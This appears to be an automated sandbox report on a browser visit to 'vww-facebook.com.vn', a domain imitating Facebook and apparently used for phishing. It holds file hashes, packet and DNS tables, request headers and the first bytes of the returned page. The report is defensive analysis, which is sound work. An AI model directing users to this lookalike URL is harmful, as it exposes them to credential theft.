          Preview:ChIKBw3bbFEaGgAKBw2+jj1PGgA=

          Chrome Cache Entry: 49

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:dropped
          Size (bytes):2385
          Entropy (8bit):4.556036774993824
          Encrypted:false
          SSDEEP:48:07t6n8MnrFQiEC2o9M64cdImBl5cDiLgq4:6uraboGGI62iMB
          MD5:EBD8798BC32C86494851A07770E04E63
          SHA1:B5461DC8F5F5F848033441D506EE05D48742438B
          SHA-256:9531E96099E973B3D1C291F3E60419D8FE4730F46DE8A492FCCD2B4C962C96CE
          SHA-512:FB376AADA13675B405EBBF55C332665B5A89B7A905323D227EDFEE7729246E37A1B6B338554FFF4A0E2BB38DFBEAED59BE278BBF6F6BDFDFB4300AA6E54743E7
          Malicious:false
          Reputation:low
          Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z"/><path class="cls-1" d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.

          Static File Info

          No static file info

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          May 28, 2024 00:33:05.701482058 CEST49678443192.168.2.4104.46.162.224
          May 28, 2024 00:33:05.779597044 CEST49675443192.168.2.4173.222.162.32
          May 28, 2024 00:33:15.452631950 CEST49675443192.168.2.4173.222.162.32
          May 28, 2024 00:33:16.335889101 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.335953951 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.336025000 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.336536884 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.336575031 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.336671114 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.336788893 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.336829901 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.337017059 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.337027073 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.810513973 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.811029911 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.811059952 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.812069893 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.812149048 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.813340902 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.813410997 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.813607931 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.813615084 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.827784061 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.828172922 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.828207016 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.829677105 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.829750061 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.830199003 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:16.830281973 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:16.854062080 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.019278049 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.019313097 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.125049114 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.460020065 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.460061073 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.460081100 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.460102081 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.460120916 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.460134983 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.460210085 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.460277081 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.460277081 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.461549044 CEST49736443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.461564064 CEST44349736188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.482693911 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.484091997 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.484126091 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.484208107 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.484467030 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.484479904 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.526513100 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.613765001 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.613857985 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.613919973 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.613923073 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.613966942 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.614022017 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.614068031 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.614203930 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.614263058 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.615756989 CEST49735443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.615780115 CEST44349735188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.979644060 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.980103970 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.980132103 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.981237888 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:17.981863022 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.982024908 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:17.982033014 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.026496887 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.034661055 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:18.118254900 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.118382931 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.118562937 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:18.118588924 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.118669987 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.118721962 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:18.124480009 CEST49738443192.168.2.4188.114.96.3
          May 28, 2024 00:33:18.124495983 CEST44349738188.114.96.3192.168.2.4
          May 28, 2024 00:33:18.155893087 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.155981064 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.156069040 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.156300068 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.156335115 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.671370983 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.676930904 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.676990986 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.680891037 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.680974007 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.681240082 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:18.681293964 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:18.681356907 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:18.683964014 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.684159994 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.684607029 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.684624910 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.687621117 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:18.687650919 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:18.732435942 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.823234081 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.823335886 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.823414087 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.823457003 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.823659897 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:18.823734999 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.916220903 CEST49741443192.168.2.4188.114.97.3
          May 28, 2024 00:33:18.916270018 CEST44349741188.114.97.3192.168.2.4
          May 28, 2024 00:33:19.379688978 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:19.379728079 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:19.379945993 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:19.380248070 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:19.380264044 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:19.404392004 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:19.404737949 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:19.404798985 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:19.406021118 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:19.406263113 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:19.463745117 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:19.464170933 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:19.516484976 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:19.516542912 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:19.561116934 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:19.863653898 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:19.891644955 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:19.891659021 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:19.892424107 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:19.892785072 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:19.892879963 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:19.893146992 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:19.934499979 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:20.194226027 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:20.194273949 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:20.194350004 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:20.197815895 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:20.197834969 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:20.509993076 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:20.510116100 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:20.510324001 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:20.510530949 CEST49744443192.168.2.4188.114.96.3
          May 28, 2024 00:33:20.510552883 CEST44349744188.114.96.3192.168.2.4
          May 28, 2024 00:33:20.837997913 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:20.838089943 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:20.840945005 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:20.840958118 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:20.841325045 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:20.884205103 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:20.910789013 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:20.910835981 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:20.910902023 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:20.911873102 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:20.911890030 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:20.926507950 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:21.089373112 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:21.089442968 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:21.089505911 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.107625008 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.107625008 CEST49745443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.107649088 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:21.107661009 CEST443497452.19.104.72192.168.2.4
          May 28, 2024 00:33:21.350642920 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.350698948 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:21.350769043 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.351569891 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.351586103 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:21.422768116 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.423851967 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:21.423870087 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.424345016 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.424994946 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:21.425075054 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.425327063 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:21.466505051 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.835226059 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.835314035 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.838927984 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:21.839076996 CEST49746443192.168.2.4188.114.97.3
          May 28, 2024 00:33:21.839104891 CEST44349746188.114.97.3192.168.2.4
          May 28, 2024 00:33:21.998383999 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:21.998568058 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.999806881 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:21.999819994 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:22.000022888 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:22.001259089 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:22.046506882 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:22.262073040 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:22.262129068 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:22.262849092 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:22.263070107 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:22.263070107 CEST49747443192.168.2.42.19.104.72
          May 28, 2024 00:33:22.263093948 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:22.263106108 CEST443497472.19.104.72192.168.2.4
          May 28, 2024 00:33:29.343873024 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:29.343939066 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:33:29.344000101 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:31.256336927 CEST49742443192.168.2.4142.250.185.196
          May 28, 2024 00:33:31.256371021 CEST44349742142.250.185.196192.168.2.4
          May 28, 2024 00:34:18.717747927 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:18.717798948 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:18.718123913 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:18.718194962 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:18.718204021 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:19.371959925 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:19.372257948 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:19.372287035 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:19.372746944 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:19.373048067 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:19.373123884 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:19.419210911 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:24.641165972 CEST4972380192.168.2.4199.232.210.172
          May 28, 2024 00:34:24.641318083 CEST4972480192.168.2.4199.232.210.172
          May 28, 2024 00:34:24.646553993 CEST8049723199.232.210.172192.168.2.4
          May 28, 2024 00:34:24.646610975 CEST4972380192.168.2.4199.232.210.172
          May 28, 2024 00:34:24.647382021 CEST8049724199.232.210.172192.168.2.4
          May 28, 2024 00:34:24.647427082 CEST4972480192.168.2.4199.232.210.172
          May 28, 2024 00:34:29.312680006 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:29.312784910 CEST44349756142.250.185.196192.168.2.4
          May 28, 2024 00:34:29.312855005 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:31.203880072 CEST49756443192.168.2.4142.250.185.196
          May 28, 2024 00:34:31.203952074 CEST44349756142.250.185.196192.168.2.4

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          May 28, 2024 00:33:14.981997013 CEST53551121.1.1.1192.168.2.4
          May 28, 2024 00:33:14.991583109 CEST53567811.1.1.1192.168.2.4
          May 28, 2024 00:33:16.004257917 CEST53571001.1.1.1192.168.2.4
          May 28, 2024 00:33:16.305474997 CEST5130353192.168.2.41.1.1.1
          May 28, 2024 00:33:16.305910110 CEST5905853192.168.2.41.1.1.1
          May 28, 2024 00:33:16.316883087 CEST53513031.1.1.1192.168.2.4
          May 28, 2024 00:33:16.579358101 CEST53590581.1.1.1192.168.2.4
          May 28, 2024 00:33:17.490879059 CEST53534961.1.1.1192.168.2.4
          May 28, 2024 00:33:18.142520905 CEST6297053192.168.2.41.1.1.1
          May 28, 2024 00:33:18.142838001 CEST5844153192.168.2.41.1.1.1
          May 28, 2024 00:33:18.151596069 CEST53629701.1.1.1192.168.2.4
          May 28, 2024 00:33:18.154023886 CEST53584411.1.1.1192.168.2.4
          May 28, 2024 00:33:18.666920900 CEST5831353192.168.2.41.1.1.1
          May 28, 2024 00:33:18.667064905 CEST6268453192.168.2.41.1.1.1
          May 28, 2024 00:33:18.675395012 CEST53583131.1.1.1192.168.2.4
          May 28, 2024 00:33:18.675729036 CEST53626841.1.1.1192.168.2.4
          May 28, 2024 00:33:18.927122116 CEST53511961.1.1.1192.168.2.4
          May 28, 2024 00:33:33.239820004 CEST53525271.1.1.1192.168.2.4
          May 28, 2024 00:33:36.237898111 CEST138138192.168.2.4192.168.2.255
          May 28, 2024 00:33:52.302678108 CEST53516921.1.1.1192.168.2.4
          May 28, 2024 00:34:14.107618093 CEST53577301.1.1.1192.168.2.4
          May 28, 2024 00:34:15.621607065 CEST53596621.1.1.1192.168.2.4

          ICMP Packets

          TimestampSource IPDest IPChecksumCodeType
          May 28, 2024 00:33:16.579485893 CEST192.168.2.41.1.1.1c232(Port unreachable)Destination Unreachable

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          May 28, 2024 00:33:16.305474997 CEST192.168.2.41.1.1.10x5984Standard query (0)vww-facebook.com.vnA (IP address)IN (0x0001)false
          May 28, 2024 00:33:16.305910110 CEST192.168.2.41.1.1.10x4ac2Standard query (0)vww-facebook.com.vn65IN (0x0001)false
          May 28, 2024 00:33:18.142520905 CEST192.168.2.41.1.1.10xb66aStandard query (0)vww-facebook.com.vnA (IP address)IN (0x0001)false
          May 28, 2024 00:33:18.142838001 CEST192.168.2.41.1.1.10x6321Standard query (0)vww-facebook.com.vn65IN (0x0001)false
          May 28, 2024 00:33:18.666920900 CEST192.168.2.41.1.1.10xee8aStandard query (0)www.google.comA (IP address)IN (0x0001)false
          May 28, 2024 00:33:18.667064905 CEST192.168.2.41.1.1.10xf5a7Standard query (0)www.google.com65IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          May 28, 2024 00:33:16.316883087 CEST1.1.1.1192.168.2.40x5984No error (0)vww-facebook.com.vn188.114.96.3A (IP address)IN (0x0001)false
          May 28, 2024 00:33:16.316883087 CEST1.1.1.1192.168.2.40x5984No error (0)vww-facebook.com.vn188.114.97.3A (IP address)IN (0x0001)false
          May 28, 2024 00:33:16.579358101 CEST1.1.1.1192.168.2.40x4ac2No error (0)vww-facebook.com.vn65IN (0x0001)false
          May 28, 2024 00:33:18.151596069 CEST1.1.1.1192.168.2.40xb66aNo error (0)vww-facebook.com.vn188.114.97.3A (IP address)IN (0x0001)false
          May 28, 2024 00:33:18.151596069 CEST1.1.1.1192.168.2.40xb66aNo error (0)vww-facebook.com.vn188.114.96.3A (IP address)IN (0x0001)false
          May 28, 2024 00:33:18.154023886 CEST1.1.1.1192.168.2.40x6321No error (0)vww-facebook.com.vn65IN (0x0001)false
          May 28, 2024 00:33:18.675395012 CEST1.1.1.1192.168.2.40xee8aNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
          May 28, 2024 00:33:18.675729036 CEST1.1.1.1192.168.2.40xf5a7No error (0)www.google.com65IN (0x0001)false
          May 28, 2024 00:33:30.476399899 CEST1.1.1.1192.168.2.40x285eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          May 28, 2024 00:33:30.476399899 CEST1.1.1.1192.168.2.40x285eNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          May 28, 2024 00:33:44.256795883 CEST1.1.1.1192.168.2.40x7d6dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          May 28, 2024 00:33:44.256795883 CEST1.1.1.1192.168.2.40x7d6dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          May 28, 2024 00:34:07.383419037 CEST1.1.1.1192.168.2.40x24d2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          May 28, 2024 00:34:07.383419037 CEST1.1.1.1192.168.2.40x24d2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          May 28, 2024 00:34:28.052913904 CEST1.1.1.1192.168.2.40x162No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          May 28, 2024 00:34:28.052913904 CEST1.1.1.1192.168.2.40x162No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • vww-facebook.com.vn
          • https:
          • fs.microsoft.com

          HTTPS Proxied Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449736188.114.96.34432844C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:16 UTC711OUTGET /d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-User: ?1
          Sec-Fetch-Dest: document
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-05-27 22:33:17 UTC824INHTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:17 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          x-powered-by: PHP/7.4.33
          set-cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb; path=/
          expires: Thu, 19 Nov 1981 08:52:00 GMT
          cache-control: no-store, no-cache, must-revalidate
          pragma: no-cache
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQ3GJwU109JKUgfG9smBmXPUx%2BFc2ncc9mFIxXEAVGUSsoC2Kez4Vo1K42YgUIpy%2FqQpb%2FvTJ2HKzG1GlT6TneyFqL1IO8foaFvD1nqZyoOoo1OAgTnWtYZfUucmXaGYqmCwOxEp"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a97738aaba8cc3-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:17 UTC545INData Raw: 31 35 38 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 74 68 65 6d 65 2f 66 62 77 65 62 31 2f 66 62 73 74 79 6c 65 2e 63 73 73 22 3e 0a 20 20 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 76 69 22 3e 0a 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e
          Data Ascii: 1580<!DOCTYPE html><html><head> <meta name="robots" content="index, follow"> <link rel="stylesheet" href="/theme/fbweb1/fbstyle.css"> <meta http-equiv="Content-Language" content="vi"> <meta charset="utf-8"> <meta name="viewport" con
